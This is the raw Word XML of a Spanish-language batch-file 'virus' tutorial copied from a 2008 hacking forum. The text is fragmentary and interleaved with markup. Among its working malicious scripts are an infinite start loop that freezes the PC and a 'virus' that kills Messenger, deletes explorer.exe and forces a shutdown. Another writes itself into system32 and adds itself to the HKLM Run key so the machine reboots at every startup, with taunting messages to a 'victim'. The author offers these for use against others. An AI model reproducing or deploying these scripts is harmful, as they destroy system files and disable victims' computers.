      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskkill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tskill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = mata procesos </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comandos del registro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Operaciones: </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>REG QUERY /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">REG ADD /? </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">REG DELETE /? </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">REG COPY /? </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">REG SAVE /? </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">REG RESTORE /? </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">REG LOAD /? </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">REG UNLOAD /? </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">REG COMPARE /? </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">REG EXPORT /? </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">REG IMPORT /? </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Usad estos comandos para obtener ayuda sobre los </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parametros</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> después de reg. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>inicio-ejecutar-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>escrivid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comando para saber lo que es (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> me ahorro el explicar cada uno </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bucles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Bueno un bucle es repetir muchas veces lo mismo </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ejemplo </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">@echo off </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>txshack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">echo te estoy haciendo un bucle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jaja</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 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txshack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jeje</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ya </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>podeis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> imaginaros las cosas que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>podeis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hacer. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>otro</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ejemplo: </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">@echo off </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>menu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 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r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Madre mía.. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>este</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> simple código , el que lo abra tendrá que reiniciar , por que el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> se le trabará todo. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>el</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lo que hace es abrir otra </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, así que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>imaginate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> este bucle infinito. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>podeis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>juegar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con esto a vuestro antojo, abriendo blocs de notas, abriendo internet..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  <w:r>
        <w:br/>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://infiernohacker.mundoforo.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nuestro segundo virus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">@echo off </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>taskkill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /F /IM msnmsgr.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>del</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /F c:\windows\system32\explorer.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>shutdown -s -t 10 -c "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Asta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>luego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lucas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">!!" </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Este virus cierra el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, elimina el proceso </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>explorer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sabeis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lo q es no) y apaga la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en 10 segundos con el mensaje asta luego </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lucas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</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Variables de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>windows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xp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">para ver el contenido de estas variables escriban en cmd.exe </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">echo %NOMBREDELAVARIABLE% </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">%COMPUTERNAME% = Nombre de host. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">%SYSTEMROOT% = Carpeta de administración Normalmente c:\windows </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">%TEMP% = directorio donde se encuentran los archivos temporales </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">%WINDIR% = directorio de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">%USERNAME% = usuario con el que se inicio sesión </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">%USERPROFILE% = directorio donde se encuentran los archivos del usuario que inicio sesión </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">%PROGRAMFILE% = directorio donde se encuentran los archivos de programas </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">%OS% = muestra el sistema operativo que estamos ejecutando </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">%LOGONSERVER% = nombre de nuestro server (\\mihost) </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">no son todos pero </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>estan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> los mas </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>importanter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ^^ </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Y bueno, por hoy lo dejo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aqui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cuando</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pueda </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>seguire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">.. ^^ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>espero</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> que pueda ser pronto. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Un saludo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TxShack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006426F1" w:rsidRDefault="006426F1" w:rsidP="006426F1"/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 w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>CAPITULO 7: CONTINUACION DE LA CREACION DE VIRUS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Bueno, puesto que muchos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estais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esperando este nuevo capitulo, e sacado un rato y por fin e podido hacerlo.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Teniendo mas o menos claros lo del tema anterior en este intentare explicaros de la forma mas clara posible como hacer que el virus se quede en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run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que se ejecute al arrancar, y algunas cosillas mas...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Podemos crear un virus que se ejecute, haga su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funcion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ya esta...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o podemos crear un virus, que se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guarte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PC y se ejecute con esta cada vez que se inicie...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Como podemos ver el daño no es igual...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imaginen este virus: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@echo off </w:t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shutdown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-r -f -t 5 </w:t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exit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 que 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reiniciar la PC a los 5 segundos, y ya esta.... no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volvera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acerlo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no ser q la victima lo vuelva a ejecutar...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Pero imaginen que este virus se inicia cuando encendemos el PC...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osea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solito...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entonces ya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joderia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algo mas no?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Pues bien, esto es lo que voy a intentar explicar.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1º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Devemos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acer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 que nuestro virus se cree en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algun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 directorio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2º Añadirlo al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registo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, (a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run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)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3º Esto ya es opcional, podemos hacer q se ejecute, o poner algo en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bat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 xml:space="preserve">...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Bueno, en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primel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lugar, comenzaremos como siempre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@echo off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continuacion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deveremos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ir al directorio donde queremos que se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qede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nuestro virus, por ejemplo C: o System32 o Windows...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Si queremos que se guarde en c: basta con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escrivir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tan solo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@echo off </w:t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Si por ejemplo queremos q se guarde en System32, pues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ariamos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@echo off </w:t>
      </w:r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cd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c:\windows\system32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Y de esta forma igual con cualquier otro directorio....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Pues bien, imaginemos q lo guardamos en System32, pues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aora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deveremos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crear un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completo en system32... es decir... crear uno desde el principio,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apartir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este...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mejor con el siguiente ejemplo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c:\windows\system32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@echo off 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shutdown -r -s -t 5 &gt;&gt;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exit &gt;&gt;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exit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Entienden lo que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echo no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??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seguido el manual desde el principio,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entenderan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porqe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&gt; y del &gt;&gt;.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Por si no lo saben se lo explico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brebemente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El &gt; sirve para crear o remplazar un archivo, y el &gt;&gt; para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excrivir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linea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siguiente.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Una vez echo esto, ya tendremos nuestro virus.bat en la carpeta system32. Ahora solo nos queda añadirlo a RUN para q se inicie con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Para ello añadiremos lo siguiente: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reg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add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hkey_local_machine\software\microsoft\windows\currentversion\run/v virus.bat/t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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reg_sz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006426F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/d C:\windows\system32 /f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Como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veran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donde pone virus.bat, es el nombre que le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dado, y poco mas adelante aparece la ruta C:\windows\system32.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Si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hubiesemos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dado otro nombre o otra ruta, solo seria modificarlo.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de momento nuestro virus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iria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c:\windows\system32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@echo off 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shutdown -r -s -t 5 &gt;&gt;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echo exit &gt;&gt;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add hkey_local_machine\software\microsoft\windows\currentversion\run/v virus.bat/t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reg_sz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/d C:\windows\system32 /f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exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006426F1" w:rsidRPr="006426F1" w:rsidRDefault="006426F1" w:rsidP="006426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Pues con esto ya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ariamos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buena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chapuzilla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alguno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xD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jeje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Ahora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podriamos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poner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algun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mensaje y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tambien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ejecutar el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Por ejemplo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07"/>
      </w:tblGrid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Cita:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006426F1" w:rsidRPr="006426F1" w:rsidTr="006426F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426F1" w:rsidRPr="006426F1" w:rsidRDefault="006426F1" w:rsidP="006426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@echo off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c:\windows\system32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@echo off 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shutdown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-r -s -t 5 &gt;&gt;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echo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&gt;&gt; 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add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hkey_local_machine\software\microsoft\windows\currentversion\run/v virus.bat/t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reg_sz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/d C:\windows\system32 /f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msg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* Estas perdido amigo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msg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* Ahora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TxShack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domina tu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pc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msg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* </w:t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jajaja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start</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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c:\windows\system32\virus.bat </w:t>
            </w:r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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006426F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exit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006426F1" w:rsidRDefault="006426F1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Bueno, y asta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aqui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explicare por hoy ^^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Espero que lo hayan entendido todo...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Otro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are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algun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virus mas complicado (mas completo) incluyendo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mataprocesos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borrado de archivos...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Pongan a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prueva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su ingenio e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imaginacion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!! Es </w:t>
      </w:r>
      <w:proofErr w:type="gram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mas</w:t>
      </w:r>
      <w:proofErr w:type="gram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facil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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lo que parece.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Un saludo, y asta pronto: </w:t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6426F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TxShack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006426F1" w:rsidRDefault="006426F1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2FC4" w:rsidRDefault="00512FC4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2FC4" w:rsidRDefault="00512FC4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2FC4" w:rsidRDefault="00512FC4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Todo fue tomado del foro web:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00512FC4" w:rsidRDefault="00512FC4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hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00CB60C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http://infiernohacker.mundoforo.com/siguiente-vt28.html?postdays=0&amp;postorder=asc&amp;start=80</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00512FC4" w:rsidRDefault="00512FC4" w:rsidP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426F1" w:rsidRDefault="006426F1"/>
    <w:sectPr w:rsidR="006426F1" w:rsidSect="00705889">
      <w:pgSz w:w="12242" w:h="15842" w:code="1"/>
      <w:pgMar w:top="1134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426F1"/>
    <w:rsid w:val="001318C4"/>
    <w:rsid w:val="004D41D5"/>
    <w:rsid w:val="00512FC4"/>
    <w:rsid w:val="006426F1"/>
    <w:rsid w:val="00705889"/>
    <w:rsid w:val="008A0F4D"/>
    <w:rsid w:val="00A74333"/>
    <w:rsid w:val="00E21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4333"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr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6426F1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="postbody">
    <w:name w:val="postbody"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="006426F1"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006426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fiernohacker.mundoforo.com/siguiente-vt28.html?postdays=0&amp;postorder=asc&amp;start=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iernohacker.mundoforo.com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infiernohacker.mundofor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3992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Paz Ortiz</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>25898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Ortiz</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Abelardo Ortiz</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-09-06T18:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2008-09-06T18:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>